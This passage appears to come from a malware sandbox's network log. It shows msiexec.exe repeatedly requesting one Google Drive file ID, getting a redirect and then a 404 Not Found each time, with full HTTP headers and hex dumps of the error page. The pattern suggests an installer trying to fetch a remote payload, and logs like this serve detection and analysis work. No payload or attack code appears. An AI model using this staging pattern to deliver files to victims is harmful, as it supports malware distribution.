                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                      Cross-Origin-Opener-Policy: same-origin
                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                      Server: ESF
                                      Content-Length: 0
                                      X-XSS-Protection: 0
                                      X-Frame-Options: SAMEORIGIN
                                      X-Content-Type-Options: nosniff
                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                      Connection: close


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      3192.168.2.1049914142.250.181.14437252C:\Windows\SysWOW64\msiexec.exe
                                      TimestampBytes transferredDirectionData
                                      2024-12-03 15:42:23 UTC460OUTGET /download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=download HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                      Cache-Control: no-cache
                                      Host: drive.usercontent.google.com
                                      Connection: Keep-Alive
                                      Cookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa
                                      2024-12-03 15:42:24 UTC1854INHTTP/1.1 404 Not Found
                                      Content-Type: text/html; charset=utf-8
                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                      Pragma: no-cache
                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                      Date: Tue, 03 Dec 2024 15:42:24 GMT
                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                      Content-Security-Policy: script-src 'nonce-aIyapcr214F2SYZ0CBv6-Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                      Cross-Origin-Opener-Policy: same-origin
                                      Content-Length: 1652
                                      X-GUploader-UploadID: AFiumC7yzxybbGQHdixWirF587o9euFwz36lAMnT78Aq46znOo8kWsbvdna8PbAxHrHqCKqzbQxoQ6ez5w
                                      Server: UploadServer
                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                      Content-Security-Policy: sandbox allow-scripts
                                      Connection: close
                                      2024-12-03 15:42:24 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 52 66 46 43 54 61 6b 59 51 74 31 66 51 49 73 63 6d 7a 64 63 61 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="RfFCTakYQt1fQIscmzdcag">*{margin:0;padding:0}html,code{font:15px/22px arial


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      4192.168.2.1049923172.217.19.1744437252C:\Windows\SysWOW64\msiexec.exe
                                      TimestampBytes transferredDirectionData
                                      2024-12-03 15:42:26 UTC418OUTGET /uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                      Host: drive.google.com
                                      Cache-Control: no-cache
                                      Cookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa
                                      2024-12-03 15:42:27 UTC1920INHTTP/1.1 303 See Other
                                      Content-Type: application/binary
                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                      Pragma: no-cache
                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                      Date: Tue, 03 Dec 2024 15:42:27 GMT
                                      Location: https://drive.usercontent.google.com/download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=download
                                      Strict-Transport-Security: max-age=31536000
                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                      Content-Security-Policy: script-src 'nonce-eCfMMmGNwrRwuo7_xz_Tng' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                      Cross-Origin-Opener-Policy: same-origin
                                      Server: ESF
                                      Content-Length: 0
                                      X-XSS-Protection: 0
                                      X-Frame-Options: SAMEORIGIN
                                      X-Content-Type-Options: nosniff
                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                      Connection: close


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      5192.168.2.1049930142.250.181.14437252C:\Windows\SysWOW64\msiexec.exe
                                      TimestampBytes transferredDirectionData
                                      2024-12-03 15:42:29 UTC460OUTGET /download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=download HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                      Cache-Control: no-cache
                                      Host: drive.usercontent.google.com
                                      Connection: Keep-Alive
                                      Cookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa
                                      2024-12-03 15:42:30 UTC1854INHTTP/1.1 404 Not Found
                                      Content-Type: text/html; charset=utf-8
                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                      Pragma: no-cache
                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                      Date: Tue, 03 Dec 2024 15:42:30 GMT
                                      Content-Security-Policy: script-src 'nonce-gCDCwilFQJroLZxYcCAMiQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                      Cross-Origin-Opener-Policy: same-origin
                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                      Content-Length: 1652
                                      X-GUploader-UploadID: AFiumC7Lo2ZmvrRpsn4sG1lpRqNbmdjRbW5ywkF3oqofr8qj_A6U35OdeHsGOUJNNBbaOmH5vGBlPF9bNg
                                      Server: UploadServer
                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                      Content-Security-Policy: sandbox allow-scripts
                                      Connection: close
                                      2024-12-03 15:42:30 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 69 5f 76 36 4a 6c 57 4a 71 43 64 46 68 48 63 57 36 6f 4f 78 30 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="i_v6JlWJqCdFhHcW6oOx0Q">*{margin:0;padding:0}html,code{font:15px/22px arial


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      6192.168.2.1049937172.217.19.1744437252C:\Windows\SysWOW64\msiexec.exe
                                      TimestampBytes transferredDirectionData
                                      2024-12-03 15:42:32 UTC418OUTGET /uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                      Host: drive.google.com
                                      Cache-Control: no-cache
                                      Cookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa
                                      2024-12-03 15:42:33 UTC1920INHTTP/1.1 303 See Other
                                      Content-Type: application/binary
                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                      Pragma: no-cache
                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                      Date: Tue, 03 Dec 2024 15:42:33 GMT
                                      Location: https://drive.usercontent.google.com/download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=download
                                      Strict-Transport-Security: max-age=31536000
                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                      Content-Security-Policy: script-src 'nonce-GBLSddByg0iycJFvn418Kw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                      Cross-Origin-Opener-Policy: same-origin
                                      Server: ESF
                                      Content-Length: 0
                                      X-XSS-Protection: 0
                                      X-Frame-Options: SAMEORIGIN
                                      X-Content-Type-Options: nosniff
                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                      Connection: close


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      7192.168.2.1049945142.250.181.14437252C:\Windows\SysWOW64\msiexec.exe
                                      TimestampBytes transferredDirectionData
                                      2024-12-03 15:42:35 UTC460OUTGET /download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=download HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                      Cache-Control: no-cache
                                      Host: drive.usercontent.google.com
                                      Connection: Keep-Alive
                                      Cookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa
                                      2024-12-03 15:42:36 UTC1854INHTTP/1.1 404 Not Found
                                      Content-Type: text/html; charset=utf-8
                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                      Pragma: no-cache
                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                      Date: Tue, 03 Dec 2024 15:42:35 GMT
                                      Cross-Origin-Opener-Policy: same-origin
                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                      Content-Security-Policy: script-src 'nonce-K_qU7H1h0y8laEanXZv6wQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                      Content-Length: 1652
                                      X-GUploader-UploadID: AFiumC4GWqdxQdMKEwD_13wPbSvXh3p_XI2PrwtnNmRknO_EtAUbhXcriud0FoZ6G-5YjWtBBUiEzAuK5g
                                      Server: UploadServer
                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                      Content-Security-Policy: sandbox allow-scripts
                                      Connection: close
                                      2024-12-03 15:42:36 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 71 41 5a 49 51 53 30 64 77 6c 41 67 2d 75 6e 65 31 7a 4b 64 75 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="qAZIQS0dwlAg-une1zKdug">*{margin:0;padding:0}html,code{font:15px/22px arial


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      8192.168.2.1049952172.217.19.1744437252C:\Windows\SysWOW64\msiexec.exe
                                      TimestampBytes transferredDirectionData
                                      2024-12-03 15:42:38 UTC418OUTGET /uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                      Host: drive.google.com
                                      Cache-Control: no-cache
                                      Cookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa
                                      2024-12-03 15:42:39 UTC1920INHTTP/1.1 303 See Other
                                      Content-Type: application/binary
                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                      Pragma: no-cache
                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                      Date: Tue, 03 Dec 2024 15:42:38 GMT
                                      Location: https://drive.usercontent.google.com/download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=download
                                      Strict-Transport-Security: max-age=31536000
                                      Content-Security-Policy: script-src 'nonce-IXQtRHHlKu83Xitm2xTd3g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                      Cross-Origin-Opener-Policy: same-origin
                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                      Server: ESF
                                      Content-Length: 0
                                      X-XSS-Protection: 0
                                      X-Frame-Options: SAMEORIGIN
                                      X-Content-Type-Options: nosniff
                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                      Connection: close


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      9192.168.2.1049960142.250.181.14437252C:\Windows\SysWOW64\msiexec.exe
                                      TimestampBytes transferredDirectionData
                                      2024-12-03 15:42:41 UTC460OUTGET /download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=download HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                      Cache-Control: no-cache
                                      Host: drive.usercontent.google.com
                                      Connection: Keep-Alive
                                      Cookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa
                                      2024-12-03 15:42:42 UTC1854INHTTP/1.1 404 Not Found
                                      Content-Type: text/html; charset=utf-8
                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                      Pragma: no-cache
                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                      Date: Tue, 03 Dec 2024 15:42:41 GMT
                                      Content-Security-Policy: script-src 'nonce-g0yU3za_5L0SxthWSXDTjw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                      Cross-Origin-Opener-Policy: same-origin
                                      Content-Length: 1652
                                      X-GUploader-UploadID: AFiumC5a9glzorMvCoxJ1eOytCN6c4Pm9J1eGB44HAU8OQPTsh0hZaicFUBPkmhIfAipwZ9gGPrbDkRbYw
                                      Server: UploadServer
                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                      Content-Security-Policy: sandbox allow-scripts
                                      Connection: close
                                      2024-12-03 15:42:42 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 79 35 55 66 57 6f 79 35 44 4e 49 6b 43 5f 58 2d 34 53 74 7a 57 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="y5UfWoy5DNIkC_X-4StzWQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      10192.168.2.1049966172.217.19.1744437252C:\Windows\SysWOW64\msiexec.exe
                                      TimestampBytes transferredDirectionData
                                      2024-12-03 15:42:43 UTC418OUTGET /uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                      Host: drive.google.com
                                      Cache-Control: no-cache
                                      Cookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa
                                      2024-12-03 15:42:44 UTC1920INHTTP/1.1 303 See Other
                                      Content-Type: application/binary
                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                      Pragma: no-cache
                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                      Date: Tue, 03 Dec 2024 15:42:44 GMT
                                      Location: https://drive.usercontent.google.com/download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=download
                                      Strict-Transport-Security: max-age=31536000
